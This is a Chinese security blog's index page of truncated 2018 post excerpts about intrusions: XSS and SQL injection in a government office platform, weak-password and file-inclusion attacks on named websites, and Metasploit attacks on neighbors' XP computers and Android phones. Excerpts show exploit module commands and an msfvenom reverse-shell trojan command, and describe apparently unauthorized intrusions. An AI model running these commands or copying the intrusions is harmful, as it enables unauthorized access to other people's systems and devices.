酷帥王子'blog-思想激进者,一搞网络安全的市井小儿,随波逐流之辈也!

同联Da3协同办公平台后台通用储存型xss漏洞

2018-9-23 9:57 作者:酷帥王子 |引用(0) |评论(0) |阅读(776) 黑盒网络渗透测试

同联Da3协同办公平台后台通用储存型xss漏洞 平台简介:   北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷...

【阅读全文】

同联Da3协同办公平台前台通用sql injection漏洞

2018-9-23 9:52 作者:酷帥王子 |引用(0) |评论(0) |阅读(802) 黑盒网络渗透测试

平台简介:   北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信...

【阅读全文】

渗透测试百货中国内网纪实

2018-9-23 9:47 作者:酷帥王子 |引用(0) |评论(0) |阅读(819) 黑盒网络渗透测试

1、 网站弱口令getwebshell 经过一番手工猜解找到网站后台http://www.smstore.cn/admin/Admin_index.aspx,习惯性的用admin admin竟然进去了,浏览一番发现可以配置上传文件类型于是配置上传类型如图:     ...

【阅读全文】

Linux本地包含漏洞入侵国外网站

2018-9-23 9:44 作者:酷帥王子 |引用(0) |评论(0) |阅读(745) 黑盒网络渗透测试

最近在搞国外网站发现一个存在本地包含漏洞的网站目标为:http://caricaturesbylori.com/index.php?page=index.php   幺嚯!page参数后面直接包含一个网页,那我们是不是可以尝试看看存在不存在包含漏洞   没能直接包含成功,...

【阅读全文】

渗透测试某大型集团企业内网

2018-9-23 9:15 作者:酷帥王子 |引用(0) |评论(0) |阅读(915) 黑盒网络渗透测试

1、弱口令扫描提权进服务器 首先ipconfig自己的ip为10.10.12.**,得知要扫描的网段为10.10.0.1-10.10.19.555,楼层总共为19层,所以为19,扫描结果如下: ...

【阅读全文】

MS14-064 漏洞测试入侵win7

2018-9-22 13:33 作者:酷帥王子 |引用(0) |评论(0) |阅读(991) 黑盒网络渗透测试

我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 然后执行命令 set PAYLOAD windows/meterpreter/re...

【阅读全文】

cve2015-5122漏洞实例演示虚拟机

2018-9-22 13:28 作者:酷帥王子 |引用(0) |评论(0) |阅读(552) 黑盒网络渗透测试

二、cve2015-5122漏洞实例演示虚拟机   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: search cve-2015-5...

【阅读全文】

flash 0day之手工代码修改制作下载者实例入侵演示

2018-9-22 13:27 作者:酷帥王子 |引用(0) |评论(0) |阅读(550) 黑盒网络渗透测试

三、flash 0day之手工代码修改制作下载者实例入侵演示 利用到的工具: Msf Ettercap Adobe Flash CS6 Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 下面我们就开始演示入侵,利用msf生...

【阅读全文】

利用CVE-2014-6332 IE全版本漏洞入侵邻居XP电脑

2018-9-22 13:04 作者:酷帥王子 |引用(0) |评论(0) |阅读(572) 黑盒网络渗透测试

一、利用 CVE-2014-6332 IE全版本漏洞入侵邻居XP电脑  闲来无事,就想着写一篇内网渗透大杂烩的文章,之前用莲花仙子账号写的两篇内网渗透文章分别为渗透测试某大型局域网、渗透测试某大型局域网网关防火墙,现如今号都被删了,哎!之前那个账号10rank,多么可惜啊! ...

【阅读全文】

metasploit+ettercap中间人攻击成功入侵邻居手机

2018-9-22 12:28 作者:酷帥王子 |引用(0) |评论(0) |阅读(800) 黑盒网络渗透测试

五、msf+ettercap入侵邻居安卓手机 首先启动msf 先用kali生成一个安卓木马,如下命令: Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/r...

【阅读全文】



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.